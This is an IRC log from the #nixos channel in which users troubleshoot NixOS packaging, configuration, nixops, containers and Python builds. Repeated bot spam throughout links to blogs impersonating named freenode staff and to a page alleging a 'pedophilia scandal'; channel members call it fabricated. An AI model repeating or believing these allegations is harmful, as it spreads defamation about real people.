<jD91mZM2> nix search then. I just don't want termplay-local visible outside of
<jD91mZM2> Now I'm getting "mkdir: cannot create directory '.cargo': File exists"
<jD91mZM2> My source does not have a .cargo
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<{^_^}> [nixpkgs] @dingxiangfei2009 opened pull request #44083 → Allow postgresql to cross compile → https://git.io/fNRWH
<jD91mZM2> Using inherit instead of drvAttrs seems to make it go away
<jD91mZM2> Seems like there are some strange fields in there I don't want. Very confusing
<tilpner> postUnpack adds a .cargo/config
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<jD91mZM2> Ah
<{^_^}> [nixos-weekly] @domenkozar pushed to fix-ci « Simplify CI and fix build »: https://git.io/fNRlG
<{^_^}> [nixos-weekly] @domenkozar opened pull request #56 → Simplify CI and fix build → https://git.io/fNRlZ
<{^_^}> [nixos-weekly] @domenkozar merged pull request #56 → Simplify CI and fix build → https://git.io/fNRlZ
<{^_^}> [nixos-weekly] @domenkozar pushed 2 commits to master: https://git.io/fNRlu
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<{^_^}> [nixos-weekly] @garbas pushed commit from NixOS Weekly Robot to gh-pages « Preview of 'ded28617d7dc80380416fb7267f3172753ffdd05' commit built by Travis-CI \#407966784 »: https://git.io/fNRlV
<{^_^}> [nixpkgs] @rembo10 closed pull request #43689 → polybar-git: init at 2018-06-23 → https://git.io/fNsXs
<etu> domenkozar: yay for nixos weekly:)
<domenkozar> o/
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<{^_^}> [nixpkgs] @justinwoo opened pull request #44084 → Update default.nix → https://git.io/fNR8W
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<nlyy> how should i install a 32 bit nixos onto another drive from existing 64bit nixos?
<nlyy> there must be a toggle in configuration.nix
<tilpner> Try nixpkgs.system = "i686-linux";
<tilpner> Though it has been a while since I used that device. Manpage says to prefer nixpkgs.localSystem
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<nlyy> there is no risk involved here, since i am working with an empty drive anyway
<nlyy> trying to set up an old laptop as a server maybe
<nlyy> can you link me the manual?
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<tilpner> For what?
<adisbladis[m]> etu: I just made a thing I think you might be interested in https://github.com/adisbladis/vgo2nix
<etu> adisbladis[m]: oh, nice. I want that since I keep my go deps as submodules now.
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<adisbladis[m]> Yeah me too.
<nlyy> i am thinking of as personal pastebin using ZeroBin
<adisbladis[m]> Vgo is pretty damn good though
<adisbladis[m]> My solution is pretty hacky but it works
<adisbladis[m]> I have tried building at least two real world projects and they both worked fine
<tilpner> nlyy - No, the manual for what? There are multiple manuals relevant to what you want to do
<nlyy> where it says to prefer nixpkgs.localSystem, i didnt find it on nix options search.
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<tilpner> nlyy - I used the manpage (man configuration.nix). In the description for nixpkgs.system it says that
<tilpner> nlyy - But maybe only because the manpage comes from unstable. Yours might not, and the option search might not either
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<booglewoogle> hey. i've arrived at using this snippet https://pastebin.com/DrLMiSBd in my configuration.nix to add the launch option '-nofriendsui' to my steam application. seems to have no effect, would anyone have a hunch why that is?
<tilpner> booglewoogle - Does passing that manually work?
<tilpner> booglewoogle - How does the resulting file look?
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<tilpner> Also, hardcoding a store path like that is really ugly
<booglewoogle> in getting the expression and manually building it? i haven't tested that, i wouldn't know where to look either. the packages search doesn't have steam (i assume because it's proprietary?)
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<booglewoogle> :( i don't know better yet, sorry!
<booglewoogle> the .desktop file you mean?
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<tilpner> booglewoogle - I fixed your thing: tx0.co/1y
<tilpner> But I can't really explain why postInstall is not executed
<booglewoogle> :OO
<booglewoogle> okay
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<booglewoogle> phew, that tells me that at least i haven't made any super obvious mistakes :p
<booglewoogle> thanks a lot, tilpner!
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<tilpner> booglewoogle - Small correction, insert .* before second @
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<booglewoogle> got it!
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<{^_^}> [nixpkgs] @cpages merged pull request #43774 → minecraft: clean and fix up → https://git.io/fNZFm
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<tilpner> "Maybe I can ask someone about a better way to do this..."
<tilpner> *Most of the file is arcane magic from Eelco, committed 2008*
<tilpner> :/
* tilpner is talking about build-support/vm, trying to restrict 9p read-access to declared closure
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<Dezgeg> if your build is sandboxed you already can't access anything else than what's in the build-time closure
<{^_^}> [nixos-weekly] @domenkozar pushed 7 commits to production: https://git.io/fNRzp
<{^_^}> [nixos-weekly] @domenkozar merged pull request #54 → Issue 2018/04 → https://git.io/fNRzh
<{^_^}> [nixos-weekly] @garbas pushed commit from NixOS Weekly Robot to gh-pages « Release of (commit '539415b4d5b14961e47c3ba841fa7c2c03546325') built by Travis-CI \#408005026 »: https://git.io/fNRgU
<tilpner> Dezgeg - That applies to normal builds, yes. But also to runInLinuxVM?
<Dezgeg> well runInLinuxVM is just a build that happens to run QEMU
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<tilpner> Hmm, so qemu runs inside the usual sandbox, and can't itself access it's not supposed to
<tilpner> *access anything it's not supposed to
<warbo> hello, is there a way to reference a file whose name isn't a valid store path, from within Nix?
<warbo> for example
<warbo> $ touch "foo'bar"
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<warbo> if I try to put this file in a derivation I get "invalid character ''' in name 'foo'bar'"
<warbo> e.g. myAttr = ./. + "/foo'bar";
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<tilpner> builtins.path { path = builtins.toPath "/tmp/foo bar"; name = "foo"; }
<warbo> ah
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<tilpner> The toPath may be unnecessary
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<warbo> yes that works thanks
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<cocreature> it looks like by default, nix will depend on the .dev output of a multioutput derivation. if I want to depend on both .dev and .out, do I just add both to buildInputs or is there a different way of depending on multiple outputs of the same derivation
<warbo> note that toPath doesn't actually make a path value, it just normalises things like '..'
<warbo> cocreature: the .outputs attribute of a derivation is a list
<warbo> cocreature: by default, Nix depends on the first one in that list
<warbo> (I think)
<warbo> so if "dev" is first, that will be used; most derivations put "out" first
<cocreature> in my case it seems to depend on the "dev" output even though it is the second (in a list of 3)
<warbo> hmm
<cocreature> and that matches the docs at https://nixos.org/nixpkgs/manual/#idm140737317821408
<cocreature> “When a multiple-output derivation gets into a build input of another derivation, the dev output is added if it exists, otherwise the first output is added.”
<warbo> ah, so 'dev' is a special case
<warbo> urgh
<warbo> :P
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<warbo> as for depending on multiple outputs, I would just stick both in your buildInputs as you say
<Dezgeg> typically depending on .dev (i.e. by putting buildInputs = [foo]; ) will make it depend on .out and .bin as well
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<cocreature> alright, thanks!
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<Myrl-saki> Is there a wrapper script generator, written as a Nix expression, or at least can be called directly from Nix?
<Myrl-saki> Okay, crap. Wrong question.
<Myrl-saki> Is the make-wrapper.sh the standard for making wrapper scripts?
<Myrl-saki> The things that I want to do is: (a) set(append?) a custom PATH in the script, and (b) add default flags to the underlying executable
<warbo> ah, my helper doesn't handle flags
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<{^_^}> [nixpkgs] @bachp opened pull request #44085 → gitlab-runner: 11.0.0 -> 11.1.0 → https://git.io/fNRaU
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<{^_^}> [nixpkgs] @dingxiangfei2009 closed pull request #44083 → Allow postgresql to cross compile → https://git.io/fNRWH
<warbo> (although it might be easy enough to do e.g. `script = ''theProgram --flag1 --flag2 "$@"''`)
<Myrl-saki> True. Thanksies.
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<{^_^}> [nixpkgs] @erikarvstedt opened pull request #44086 → paperless: init at 2.1.0 → https://git.io/fNRw2
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<freusque> Hi. Has anyone had issues with lockfile lengths here? :)
<freusque> specifically, I get it from the activation scripts, http://nixpaste.lbr.uno/ptRsC2JA?nix
<freusque> when rebuilding my nixos system
<freusque> this is using nixos-unstable
<tilpner> Something is really broken about your system
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<tilpner> Or is that a really new thing I missed?
<tilpner> Usually, paths are much shorter than yours
<freusque> the configuration sources are a bit hacky https://github.com/freuk/nixrc
<freusque> I pin everything
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<freusque> okay
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<srhb> What the o_O
<tilpner> Exactly, srhb
<freusque> mmh
<srhb> I mean, haha, I guess there's nothing _wrong_ with that...
<srhb> Except for filename too long :D
<jD91mZM2> We should call this bug a feature there to prevent collisions!
<srhb> Actually it does look like there's some store-specific thing happening in a nested fashion.
<freusque> store paths are fine in general
<tilpner> nixpkgs: /nix/store/gws6macwzxahlr3g2q3mq7q1mxxjvkk9-xmm9qs79msgslkwp3ajpab5h0vxgkc04-vsi1wzsxnlxwhimygmklfl12wzaqq1xq-1lhqd0w3yi88g82iypz0lz4lp27jdx4v-4w619sz5ds28v0hjbsbf6zqqf0a6dlvl-46x4gkwcsn9zmmkralc7r860l6mm0wx9-5x1pc08xgw2zra2g9iam8vshr3f97sa0-nixos
<srhb> What does your NIX_PATH look like?
<freusque> but my nixpkgs is indeed this huge path
<tilpner> That doesn't look fine
<freusque> nixpkgs=/nix/store/gws6macwzxahlr3g2q3mq7q1mxxjvkk9-xmm9qs79msgslkwp3ajpab5h0vxgkc04-vsi1wzsxnlxwhimygmklfl12wzaqq1xq-1lhqd0w3yi88g82iypz0lz4lp27jdx4v-4w619sz5ds28v0hjbsbf6zqqf0a6dlvl-46x4gkwcsn9zmmkralc7r860l6mm0wx9-5x1pc08xgw2zra2g9iam8vshr3f97sa0-nixos:ssh-config-file=/home/fre/sesame/workspace/infra/nixrc/modules/programs/ssh/ssh_config.secret:nixos-config=/etc/nixos/configuration.nix:frepkgs=/home/fre/ses
<freusque> ame/workspace/infra/nixrc/pkgs
<srhb> Ouch
<freusque> yeah
<srhb> It's like your accumulating all the hashes through some chain of bootstrapping the pins or something.
<srhb> you're
<srhb> I wonder if each time you rebuild you add another chain :P
<freusque> haha
<srhb> Should be testable by resetting it to something sane and rebuilding
<freusque> I'll try to set that nixpkgs variable in another way then
<srhb> Then rebuilding again :P
<freusque> yeah.. :D
<tilpner> So you're using the name of the nixpkgs source somewhere?
<srhb> That's glorious by the way. If you can make up a minimal example that demonstrates this, I'd love to see it :-)
<freusque> I am , here http://nixpaste.lbr.uno/T_JxHwYd?nix tilpner
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<freusque> it's just my dumb self trying to ping everything
<freusque> which BTW isn't really working because the root user channel impacts the build in a way I don't understand
<tilpner> Oh, I pin everything too, and it doesn't turn into that chaos
<tilpner> :/
<freusque> may I please see how you do it
<freusque> I'd really like to. :)
* tilpner pm
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<{^_^}> [nixpkgs] @ua74e3dqka opened pull request #44088 → yed: version update to 3.18.1 → https://git.io/fNRiq
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<{^_^}> [nixpkgs] @lheckemann opened pull request #44089 → nixos/release: use real paths of netboot files → https://git.io/fNRP3
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<srhb> Oh my goodness, it looks like we're going to have a succesful unstable build
<srhb> ... great, now I jinxed it.
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<etu> srhb: It's not dead yet!
<srhb> No, but the big hit-or-miss is chromium :P
<etu> Mmhm
* etu is not unhappy with the current unstable though, which is nice :p
<srhb> I am not either. Well. I'm on some-master-newer-than-current-unstable
<srhb> MIght as well just go to master at this point tbh...
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<etu> I heard that there's some people running on master, but I've always been told off due to possible issues.
<srhb> Sure, of course.
<srhb> My "not-quite-unstable" is usually a potential unstable that failed on Hydra for reasons I don't care about
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<etu> Ah, well. That's one way to do it. Pick commits where all the tests one cares about worked :p
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<srhb> It satisfies my desire for bleeding edge at least :P
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<srhb> chromium build has been going for 15 hours...hnnn
<srk> hehe, this :) I'm running of master for over a year now with no issues iirc
<etu> Well, in theory things like bootloader can break so one can't pick an older generation from the boot menu. But as long one knows the risk and how to work with the system I'd say everyone is responsible for their own :p
<Myrl-saki> Okay, um.
<Myrl-saki> How would I use nix-build builders with nixops?
<srhb> etu: Yeah, not recommending master to people who aren't really into fixing their systems from superbreakage is a good idea :-)
<Myrl-saki> In a not-so-hacky manner, hopefully.
<Myrl-saki> One thought was to make a URI for nixops.
<srhb> Myrl-saki: How much wood does a woo-- what do you mean?
<srk> Myrl-saki: you can configure builders systemwide
<etu> srhb: I've been on gentoo for 8 years, so I'm not scared :D
<Myrl-saki> srk: --option 'ssh://nixops-machine'
<Myrl-saki> srhb: *
<srhb> etu: I haven't been on Gentoo for about 10 years... :P
<srhb> etu: But I guess the attitude sticks
<Myrl-saki> OTOH
<etu> srhb: I haven't been there for 4 years, but the attitude of not being scared sticks I think :)
<d1rewolf_> how "secure" are nixos-containers considered? can you use them to run untrusted code and be sure your host is reasonably safe?
<Myrl-saki> Maybe I should just use a nix-build wrapper.
<srhb> d1rewolf_: I believe there's a notice in the manual that they are not secure.
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<Myrl-saki> Like.
<srhb> d1rewolf: "Warning: Currently, NixOS containers are not perfectly isolated from the host system. This means that a user with root access to the container can do things that affect the host. So you should not give container root access to untrusted users."
<Myrl-saki> nixops ssh "nix-build; nix-sotre --export" | nix-store --import
<Myrl-saki> Maybe some nix-copy-closure too.
<d1rewolf_> Myrl-saki, hah...if they had just not highlighted the notice, I might've seen that :). I need more coffee
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<Myrl-saki> d1rewolf_: Yes, you need more coffee. :P
* srhb snickers
<Myrl-saki> srhb: :D
<d1rewolf_> srhb, yeah, thanks :). I would like to understand more thought...are they impossible to make more secure, or is there opportunity for willing contributers?
<d1rewolf_> I love the idea of containers, but I love the idea of them even more if I could use them to run untrusted code ;)
<srhb> d1rewolf_: iirc they're currently systemd-nspawn thingamajicks, so I think further details are probably found upstream in that :)
<srhb> Agreed.
<d1rewolf_> srhb, cool. I'll take a look there. thx
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<srhb> I'd feel reasonably safe without giving root privileges to whatever runs in there though.
<srhb> I don't think there's a single container solution out there that I trust with root.
<d1rewolf_> srhb, true that.
<tilpner> I'd trust a VM with internal root
<srhb> Yup, same.
<tilpner> (Yes, you said containers, but the line is blurring, and I don't see why NixOS containers couldn't use qemu)
<d1rewolf_> srhb, I would like to, for example, run a browser session within a container, so that whatever bad websites i *accidentally* visit couldn't touch the host file system. but I don't know if this is possible yet...I imagine some x window trickery will be necessary
<srhb> I'd call them nixos-vm's then
<Myrl-saki> ${nix}/bin/nix-store --export $(${nix}/bin/nix-store -qR $(${nix}/bin/nix-instantiate $@)) | ${nixops}/bin/nixops ssh "cat | nix-store --import"/
<Myrl-saki> Any thouhts?
<srhb> d1rewolf_: Which you can do with nixops quite nicely.
<srhb> Myrl-saki: Aside from "why not set up builders properly?" :)
<tilpner> d1rewolf_ - Note that I cannot vouch for it. I have it open in a tab for further inspection :)
<Myrl-saki> srhb: Yeah, good point. :P
<d1rewolf_> tilpner, ooooohhh...thanks. looks very interesting
<tilpner> d1rewolf_ - I run my qutebrowser with bubblewrap, so it already can't see my filesystem
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<tilpner> But that's not the same level of isolation this could potentially give
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<d1rewolf_> someone had mentioned there's some sort of wrapper that makes working with nixos containers easier and provided a github link. I haven't found working with nixos-container to be difficult at all, but I'd still like to understand what that project adds. My mind tells me it was "easy-container", but can't find that. anyone know what it is?
<d1rewolf_> tilpner, bubblewrap is new to me. thanks for the tip
<d1rewolf_> tilpner, btw, I know i already told you this, but qutebrowser is working out so nicely. thanks for that tip. If it only had a way of storing multiple book mark lists, it'd be close to ideal. thanks again for that pointer
<d1rewolf_> tilpner, that's it. thanks
<tilpner> d1rewolf_ - I might be up for another round of burnout working on declarative nixos vms, if you start working on that
<{^_^}> [nixpkgs] @dezgeg pushed to master « simg2img: Init at 1.1.3 »: https://git.io/fNR1s
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<d1rewolf_> tilpner, I'm so new to nixos, I need a few more weeks of learning. but after that, I may take that plunge. what a nice way to learn ;)
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<tilpner> Yes, so nice, you really need to try it
* tilpner wipes up the sarcasm
<d1rewolf_> tilpner, sorry, but my coffee is still brewing and I'm slow this morning...try what exactly? Taking a plunge?
<tilpner> (Last time failed because all things container are Go, and patchelf doesn't like Go)
* d1rewolf_ loves Go
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<d1rewolf_> well, strongly likes
<d1rewolf_> there are things I'd change
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<acowley> Can anyone take a look at this PR I opened a week ago? https://github.com/NixOS/nixpkgs/pull/43687
<{^_^}> #43687 (by acowley, open): pcl: boost167 compatibility
<acowley> It's pretty minor
<acowley> And the build has been broken on hydra for a while
<acowley> So not exactly high risk
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<fpletz> acowley: triggered ofborg build and will merge if it succeeds, thanks!
<acowley> fpletz: Thank you!
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<d1rewolf_> tilpner, are there any remnants of the past effort left, or would it be better to start from scratch?
<tilpner> d1rewolf_ - Do start from scratch, please, I don't want to show those files to anyone :/
<d1rewolf_> lol
<d1rewolf_> k
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<d1rewolf_> I'm really, honestly surprised that NixOS hasn't taken over the world yet. this is the way linux should be done
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<tilpner> d1rewolf_ - Though appvm looks quite good. Make sure it can't be reused before actually starting from scratch
<d1rewolf_> tilpner, k
<d1rewolf_> anyone use keybase here? I note that it has multiple components (keybase service, kbfs, keybase-gui), and that they appear to all need to be launched separately. Just curious how others are launching these. I'm thinking about launching from my i3 config
<d1rewolf_> but interested to learn how others are doing it
<srhb> d1rewolf: I am
<tilpner> home-manager seems to have a module
<srhb> All I have is... services.keybase.enable = true; services.kbfs.enable = true;
<srhb> In my global config
<d1rewolf_> srhb, ah, that's easier. thank you
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<d1rewolf_> should've looked for options
<srhb> I don't remember how it works because it hasn't broken for a very long time...
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asymmetric_ is now known as asymmetric
<asymmetric> how do i check if a key is present in an attribute set?
<d1rewolf_> srhb, hmm...added both to my config. nixos-option shows they're set to true, but for some reason kbfs still doesn't mount
<{^_^}> [nixpkgs] @balsoft opened pull request #44090 → Cherry-pick commit that fixes libreoffice wrapper to release-18.04 → https://git.io/fNRDI
<tilpner> > builtins.hasAttr "foo" { foo = 42; }
<{^_^}> true
<tilpner> > builtins.hasAttr "bar" { foo = 42; }
<{^_^}> false
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<d1rewolf_> srhb, do you know if enabling it should launch the keybase service? I'm looking at keybase.nix, and it creates a user-level systemd service
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<MJ94|> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<MJ94|> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<MJ94|> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<asymmetric> tilpner: could i also use ?
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<d1rewolf_> but it's not running for me.
<tilpner> asymmetric - Ah, yes
<tilpner> > { foo = 42; } ? foo
<{^_^}> true
<tilpner> > { foo = 42; } ? bar
<{^_^}> false
<jD91mZM2> oooo
<srhb> And often you want...
<tilpner> > { foo = 42; }.bar or 21
<srhb> > { foo = 42; }.bar or 43
<{^_^}> 21
<{^_^}> 43
<srhb> 43 > 21 -- fact.
<d1rewolf_> starting keybase and kbfs services manually with "systemctl --user start" doesn't seem to fix it either. hmm
<asymmetric> > { foo = false; }.foo or 21
<{^_^}> false
<d1rewolf_> tilpner, could you share your bwrap syntax for running qutebrowser?
<asymmetric> so .foo in that or returns true, and then its value is false.. ?
<tilpner> d1rewolf_ - tx0.co/1z
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<d1rewolf_> tilpner, thx very much
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<tilpner> d1rewolf_ - I'll eventually get around to cleaning it up and pushing makeBubblewrap to the NUR
<asymmetric> > { foo = false; }.bar or 21
<{^_^}> 21
<tilpner> d1rewolf_ - I also have a beautiful wrapper that does IPC with qute to input passwords from outside
<tilpner> (It's not beautiful)
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<d1rewolf_> tilpner, nice
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<asymmetric> > { foo = 42 }.foo
<{^_^}> error: syntax error, unexpected '}', expecting ';', at (string):162:12
<asymmetric> > { foo = 42; }.foo
<{^_^}> 42
<asymmetric> > { foo = false; }.foo
<{^_^}> false
<asymmetric> > { foo = false; }.foo or 42
<{^_^}> false
<asymmetric> tilpner: shouldn't the above return 42?
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<tilpner> No, why? foo was found
<hlolli> can someone have ofborg build https://github.com/NixOS/nixpkgs/pull/44076 ?
<{^_^}> #44076 (by hlolli, open): lumo: init at 1.9.0-alpha
<asymmetric> if it's found it evaluates to its value, which then is ORed with 42
<d1rewolf_> tilpner, ok, so the qute file you shared defines a function, but how do you use it? sorry...this is the first time I've used a custom nix function outside of configuration.nix
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<tilpner> d1rewolf_ - I just callPackage it
<Myrl-saki> ,espcape '
<{^_^}> Myrl-saki: Did you mean escape"?
<{^_^}> ': " double quote: \" backslash: \\ bash curly bois: \${} newline: \n tab: \t "
<Myrl-saki> ,escape '
<{^_^}> Myrl-saki: Did you mean escape"?
<{^_^}> ': " double quote: \" backslash: \\ bash curly bois: \${} newline: \n tab: \t "
<Myrl-saki> ,escape'
<{^_^}> Myrl-saki: Did you mean escape"?
<{^_^}> " double quote: \" backslash: \\ bash curly bois: \${} newline: \n tab: \t "
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<Myrl-saki> Oh okay. Sorry for that spam.
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<tilpner> d1rewolf_ - (callPackage path/to/qute.nix {}) would work in your systemPackages if you had the rest installed properly
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<d1rewolf_> tilpner, to it launches qutebrowser on rebuild?
<tilpner> What
<tilpner> No
<tilpner> None of your applications are launched when you build them
<tilpner> This isn't launched either
<d1rewolf_> tilpner, ok. sorry... I misunderstood.
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<tilpner> Don't worry. You can ask me later/tomorrow to get this working, I don't have enough time left right now to walk you through it :)
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<d1rewolf_> tilpner, sure, thanks ;) I'll play with it as well
<d1rewolf_> what is this freenodegate thing? :-/
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<betaboon> gchris`wednesday: what's the current status of your nixops-terraform proposal ?
<Myrl-saki> How do I access nixops SSH?
<Myrl-saki> SSH keypair*
<srk> d1rewolf_: We're aware of spam being sent on other networks with URLs to fake blog posts impersonating freenode staffers, please
<srk> just ignore them and don't exacerbate things by distributing them further. We are aware.
<Myrl-saki> I did not explicitly set an SSH keypair, not even as a resource. Only the EC2 keypair.
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<d1rewolf_> srk, sure, sorry. that's the first i've seen of it. weird and a shame
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<|Leary> As a rule of thumb, anything being spread around by bots on freenode is manufactured nonsense.
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<srk> someone got banned and can't get over it :)
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<MyIgel> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
<d1rewolf_> srk, that's taking it to the extreme
<d1rewolf_> sheesh
<Myrl-saki> What is an EC2 keypair anyway?
<d1rewolf_> Myrl-saki, a keypair used to access ec2
<d1rewolf_> you use it to auth to ssh into the ec2 instance
<Myrl-saki> Right.
<Myrl-saki> How do I access the keypair?
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<Myrl-saki> Outside of nixops
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<Myrl-saki> Errr
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<Myrl-saki> is it a better idea to just make an SSH key?
<d1rewolf_> Myrl-saki, I don't use nixops yet
<d1rewolf_> but i typically create the keypair through the web interface
<d1rewolf_> it's a downloadable .pem file iirc
<Myrl-saki> Yeah.
<Myrl-saki> The problem is I don't know where the .pem file is stored in Nixops.
<d1rewolf_> and then ssh -i /path/to/pem ubuntu@ecinstanceip
<d1rewolf_> ah, sorry
<Myrl-saki> And it's not in ~/.nixops.
<d1rewolf_> can't help with that
<Myrl-saki> No worries.
<Myrl-saki> Time to turst `find` or something.
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<srk> it's in ~/.nixops/deployments.nixops
<srk> which is sqlit3 db
<Myrl-saki> srk: Right.
<Myrl-saki> So...
<srk> keypair is autogenarated and stored there
<Myrl-saki> hm
<d1rewolf_> Myrl-saki, updatedb and locate come in handy in those caases
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<srk> if it doesn't work - it sucks! :D
<Myrl-saki> srk: Got any idea how to use it with --option builders?
<Myrl-saki> Aside from just using SSH.
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<Myrl-saki> Because I think that's exactly what I'll do.
<srk> not really, but you can set builders system wide
<Myrl-saki> I mean, aside from generating a keypair.
<d1rewolf_> tilpner, damn it...the link expired before i copied your qute config. if you are still around and have time, can you paste again?
<{^_^}> [nixpkgs] @fpletz merged pull request #43687 → pcl: boost167 compatibility → https://git.io/fNsow
<{^_^}> [nixpkgs] @fpletz pushed commit from @acowley to master « pcl: boost167 compatibility »: https://git.io/fNRH0
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<acowley> fpletz: Thanks for the help!
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<infinisil> ,escape'' Myrl-saki
<{^_^}> Myrl-saki: '' two single quotes: ''' bash curly bois: ''${} newline: ''\n tab: ''\t any character x: ''\x ''
ejpcmac has joined #nixos
<infinisil> Or you can look at all commands with just "," :)
<infinisil> ,
<{^_^}> All commands: -A IFD NUR arm ask bootfull callPackage channels cloudfront context dnw error escape" escape'' escape-special fancy-uninstall github hardware help home-manager library logs nix-env-r nix-info nix-repl nixGL nixcon nixeval nixpkgsVersion not-os notfound outPath overlay paste pills pinning pr profiling pure-eval replaceModule runtimeDeps stateVersion stuck thesis timer todeclarative tofu unfree unstable which-channel whomademe wololo
<{^_^}> [nixpkgs] @asymmetric opened pull request #44091 → buildMaven: Check for authenticated attribute → https://git.io/fNR71
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<Taneb> How can I edit the grub script thing to skip fsck'ing the disk? I've got something very dodgy going on
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<Taneb> logzet: I'm not getting far enough into boot to change that
<logzet> So fsck fails and you cannot boot your nixos?
<Taneb> Yes
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<Taneb> It's hanging on boot, even on old configurations
<logzet> You could try to boot a live nixos and change the config using that?
<Taneb> The issue is this is a VM's disk
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<logzet> You could insert the iso into the vm
<logzet> I'm not familiar enough with grub to answer your original question though, sry
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<hyper_ch2> why not run live iso, do fsck on the disk and then boot normally again?
<{^_^}> [nixpkgs] @ryantm merged pull request #43866 → yaxg: init at 2018-07-20 → https://git.io/fNW3f
<{^_^}> [nixpkgs] @ryantm pushed commit from @neonfuz to master « yaxg: init at 2018-07-20 »: https://git.io/fNR5A
<{^_^}> [nixpkgs] @ryantm merged pull request #44062 → kubetail: init at 1.6.1 → https://git.io/fNBPu
<{^_^}> [nixpkgs] @ryantm pushed commit from @kalbasit to master « kubetail: init at 1.6.1 »: https://git.io/fNRdY
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<Taneb> hyper_ch2: that's an option, I've started downloading the minimal installation CD (didn't have one handy)
<{^_^}> [nixpkgs] @domenkozar pushed to master « haskell: move yaml overrides to configuration-nix »: https://git.io/fNRdP
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<Taneb> But I was hoping there would be something I could change in the commands grub runs (which I can do at boot)
<{^_^}> [nixpkgs] @Ericson2314 merged pull request #44081 → cross stdenv: Forget `allowedRequisites = nulll;` on inline → https://git.io/fNRZw
<{^_^}> [nixpkgs] @Ericson2314 pushed 2 commits to master: https://git.io/fNRFn
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<d1rewolf_> guys, I've added both python27Packages.pycurl and python27Packages.pycurl2 to my config, rebuilt, but "import pycurl" still says "ImportError: No module named pycurl". any idea why?
<{^_^}> [nixpkgs] @Ericson2314 reopened pull request #44083 → Allow postgresql to cross compile → https://git.io/fNRWH
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<Taneb> hyper_ch: :( the VM doesn't boot with the nixos live CD
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<andreabe_> hello! I'm trying to cache my builds by copying derivations to s3, I tried doing `nix copy --to $S3_STORE` after `nix-build` but it fails saying it can't find some store path (which doesn't exists). intriguingly the missing path has the same name as result but a different hash
<d1rewolf_> Taneb, why would that be? You can't boot a vm using the live cd?
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<{^_^}> [nixpkgs] @adevress opened pull request #44092 → Add initial support to create a powerpc64le boostrap → https://git.io/fNRA0
<d1rewolf_> is this guidance still accurate? https://nixos.wiki/wiki/Python
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<ephemer0l__> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<ephemer0l__> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<ephemer0l__> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<Faylite_> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<J21_> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<d1rewolf_> what's the nixos equivalence of Debian's build-essentail package?
<Yaniel> there isn't one AFAIK
<Yaniel> because it depends on what you are building
<d1rewolf_> Yaniel, ok, thanks
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<betaboon> hello #nixos, recursiveUpdate doesnt merge lists, how can i overcome that ?
<d1rewolf_> I'm trying to use pip to install a python package. it fails with: src/pycurl.h:164:13: fatal error: openssl/ssl.h: No such file or directory. I've installed openssl.dev, and openssl.h is located at /nix/store/jd644x3ppch1i92lbiw837bd1rylqgip-openssl-1.0.2o-dev/include/openssl/ssl.h
<d1rewolf_> is this a case where I need to add /usr/include to pathsToLink?
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<d1rewolf_> how does one fix this?
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<SkyPatrol> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<mkaito> lol now we get freenode spam? hilarious
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<Yaniel> we get spam, you get spam, everyone gets spam!
Levex has joined #nixos
<Yaniel> ain't it a wonderful day
<Levex> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<d1rewolf_> anyone using pip on top of nixos?
<goibhniu> d1rewolf_ yep
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<d1rewolf_> goibhniu, can you share how you got it working?
<d1rewolf_> I'm trying to use pip to install a python package. it fails with: src/pycurl.h:164:13: fatal error: openssl/ssl.h: No such file or directory. I've installed openssl.dev, and openssl.h is located at /nix/store/jd644x3ppch1i92lbiw837bd1rylqgip-openssl-1.0.2o-dev/include/openssl/ssl.h.
<d1rewolf_> I've added /usr/include to environment.pathsToLink
<d1rewolf_> but still no dice
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<goibhniu> d1rewolf_ right, you need to set some environment variables, you should use nix-shell too
<goibhniu> (I use nixos-containers)
<goibhniu> there's some stuff on the wiki about it ... lemme see
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<d1rewolf_> goibhniu, yeah, this is in a nixos-container
<d1rewolf_> goibhniu, I found this: https://nixos.wiki/wiki/Python
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<d1rewolf_> but I couldn't get the syntax at the top working, so I decided to fall back to virtualenv
<d1rewolf_> I also tried adding python27Packages.pycurl to my configuration.nix and updating, but even though it was installed, python said it coudln't find it
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<goibhniu> hrm, it seems to be gone from the wiki :/
<d1rewolf_> I got an ImportError: No module named pycurl
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<Asorailahd> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<goibhniu> d1rewolf_ I do stuff like this: http://nixpaste.lbr.uno/659_EBCv?nix
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<goibhniu> if you want to add python modules from nixpkgs, you can use the wiki page you posted
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<rxy_26> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<{^_^}> [nixpkgs] @WilliButz opened pull request #44093 → grafana: 5.2.1 -> 5.2.2 → https://git.io/fNRhC
<Raccoon8> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<srk> ,python
<{^_^}> python defined
<srk> d1rewolf_: ^
<d1rewolf_> goibhniu, hmmm...thanks. I'll have to experiment more.
<d1rewolf_> srk, oh...wow. that's definitely more info
<d1rewolf_> is the wiki deprecated or something in favor of the manual?
<srk> not really, the coexist happily
<srk> *they
<srk> sometimes you just need to look in nixpkgs manual as well (not only nixos manual)
<srk> sometimes nix manual is handy as well :)
<d1rewolf_> srk, ok, thank you
<srk> d1rewolf_: doing deployments of python with nixo(p)s?
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<d1rewolf_> srk, trying to just get a nixos-container set up with some packages I need.
<srk> ah, ok :)
<srk> ,haskell
<{^_^}> haskell defined
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<sdx236> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
